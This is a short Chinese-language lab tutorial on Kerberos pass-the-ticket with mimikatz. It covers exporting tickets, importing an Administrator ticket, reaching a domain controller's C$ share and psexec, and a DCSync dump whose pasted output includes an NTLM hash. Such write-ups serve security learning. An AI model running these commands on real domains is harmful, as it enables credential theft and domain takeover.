缓存票据
可在非域机器上使用,访问必须用ComputerName.domain.local的形式去访问。
'域机器上导出可用票据,拷贝到本地mimikatz privilege::debug "sekurlsa::tickets /export" exit'在攻击者机器上导入高权限票据mimikatz privilege::debug "kerberos::ptt C:\Users\jack\Desktop\Administrator@krbtgt-TT.COM.kirbi" exit'使用票据访问其他域机器,还可以使用mimikatz直接同步导出指定用户的hashdir \\域机器名.域名\c$psexec \\域机器名.域名 cmdmimikatz "lsadump::dcsync /domain:tt.com /user:administrator" exit
C:\Users\jack\Desktop>mimikatz privilege::debug "kerberos::ptt C:\Users\jack\Desktop\Administrator@krbtgt-TT.COM.kirbi" exitmimikatz(commandline) # privilege::debugERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061mimikatz(commandline) # kerberos::ptt C:\Users\jack\Desktop\Administrator@krbtgt-TT.COM.kirbi* File: 'C:\Users\jack\Desktop\Administrator@krbtgt-TT.COM.kirbi': OKmimikatz(commandline) # exitBye!
C:\Users\jack\Desktop>dir \\WIN-J341S97EGGH.tt.com\c$驱动器 \\WIN-J341S97EGGH.tt.com\c$ 中的卷没有标签。卷的序列号是 7E13-549E\\WIN-J341S97EGGH.tt.com\c$ 的目录2009/07/14 11:20 <DIR> PerfLogs2020/08/28 21:24 <DIR> Program Files2020/08/28 21:24 <DIR> Program Files (x86)2020/08/28 21:54 <DIR> Users2020/08/29 16:14 <DIR> Windows0 个文件 0 字节5 个目录 30,553,546,752 可用字节
C:\Users\jack\Desktop>mimikatz "lsadump::dcsync /domain:tt.com /user:administrator" exitmimikatz(commandline) # lsadump::dcsync /domain:tt.com /user:administrator[DC] 'tt.com' will be the domain[DC] 'WIN-J341S97EGGH.tt.com' will be the DC server[DC] 'administrator' will be the user accountObject RDN : Administrator** SAM ACCOUNT **SAM Username : AdministratorAccount Type : 30000000 ( USER_OBJECT )User Account Control : 00000200 ( NORMAL_ACCOUNT )Account expiration : 1601/1/1 8:00:00Password last change : 2020/8/28 21:26:05Object Security ID : S-1-5-21-1881962959-1052950955-462027270-500Object Relative ID : 500Credentials:Hash NTLM: 30a96699356033b84283b8918a895d67
若有收获,就点个赞吧
0 人点赞
